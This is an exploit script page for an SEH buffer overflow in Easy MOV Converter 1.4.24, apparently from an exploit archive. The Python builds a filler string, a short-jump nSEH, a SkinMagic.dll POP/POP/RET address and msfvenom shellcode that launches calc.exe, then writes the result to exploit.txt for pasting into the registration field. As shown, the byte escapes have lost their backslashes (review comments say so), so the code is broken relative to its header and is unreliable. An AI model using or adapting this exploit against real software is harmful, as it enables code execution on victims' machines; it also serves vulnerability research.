Easy MOV Converter 1.4.24 Buffer Overflow
Posted on 15 June 2017
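#!/usr/bin/python
###############################################################################
# Exploit Title: Easy MOV Converter 1.4.24 - 'Enter User Name' Field Buffer Overflow (SEH)
# Date: 13-06-2017
# Exploit Author: @abatchy17 -- www.abatchy.com
# Vulnerable Software: Easy MOV Converter
# Vendor Homepage: http://www.divxtodvd.net/
# Version: 1.4.24
# Software Link: http://www.divxtodvd.net/easy_mov_converter.exe
# Tested On: Windows 7 SP1 32bit
#
# Special thanks to @t_tot3s for pointing out how stupid I am. Credit to Muhann4d for discovering the PoC (41911).
#
# To reproduce the exploit:
# 1. Click Register
# 2. In the "Enter User Name" field, paste the content of exploit.txt
#
##############################################################################
#
# The script only assembles a string and writes it to exploit.txt; the file is
# laid out as: filler + nSEH + SEH + junk + buf.
#
# NOTE(review): as transcribed on this page every literal below is plain ASCII
# text (e.g. the three characters "x41"), not a byte escape, so the file that
# is written holds that text verbatim rather than the bytes the header describes.

# Filler up to the SEH record. If you're using WinXP SP3, change this to 996
buffer = "x41" * 1008

# Next-SEH slot.
nSEH = "xebx10x90x90"

# 0x1001145c : pop esi # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.8.1.1 (C:Program FilesEasy MOV ConverterSkinMagic.dll)
SEH = "x5cx14x01x10"

# Characters that must not appear in the payload: 0x00, 0x0a, 0x0d (and 0x80 to 0xff).
# Kept for reference only; nothing below reads it (the original bound this
# name twice, first as "x00x0ax0d", then as the value here).
badchars = "x0ax0d"

# msfvenom -p windows/exec CMD=calc.exe -b "x00x0ax0d" -f python
buf = ""
buf += "xdaxd7xd9x74x24xf4xbax07xc8xf9x11x5ex2b"
buf += "xc9xb1x31x31x56x18x03x56x18x83xeexfbx2a"
buf += "x0cxedxebx29xefx0exebx4dx79xebxdax4dx1d"
buf += "x7fx4cx7ex55x2dx60xf5x3bxc6xf3x7bx94xe9"
buf += "xb4x36xc2xc4x45x6ax36x46xc5x71x6bxa8xf4"
buf += "xb9x7exa9x31xa7x73xfbxeaxa3x26xecx9fxfe"
buf += "xfax87xd3xefx7ax7bxa3x0exaax2axb8x48x6c"
buf += "xccx6dxe1x25xd6x72xccxfcx6dx40xbaxfexa7"
buf += "x99x43xacx89x16xb6xacxcex90x29xdbx26xe3"
buf += "xd4xdcxfcx9ex02x68xe7x38xc0xcaxc3xb9x05"
buf += "x8cx80xb5xe2xdaxcfxd9xf5x0fx64xe5x7exae"
buf += "xabx6cxc4x95x6fx35x9exb4x36x93x71xc8x29"
buf += "x7cx2dx6cx21x90x3ax1dx68xfexbdx93x16x4c"
buf += "xbdxabx18xe0xd6x9ax93x6fxa0x22x76xd4x5e"
buf += "x69xdbx7cxf7x34x89x3dx9axc6x67x01xa3x44"
buf += "x82xf9x50x54xe7xfcx1dxd2x1bx8cx0exb7x1b"
buf += "x23x2ex92x7fxa2xbcx7exaex41x45xe4xae"

# Padding between the SEH record and buf.
junk = "x90" * 16

# Final file content, in the order the header describes.
data = buffer + nSEH + SEH + junk + buf

# Text mode, as in the original. The context manager guarantees the handle is
# closed even if the write raises; the original open()/write()/close() left it
# open on error.
with open("exploit.txt", "w") as f:
    f.write(data)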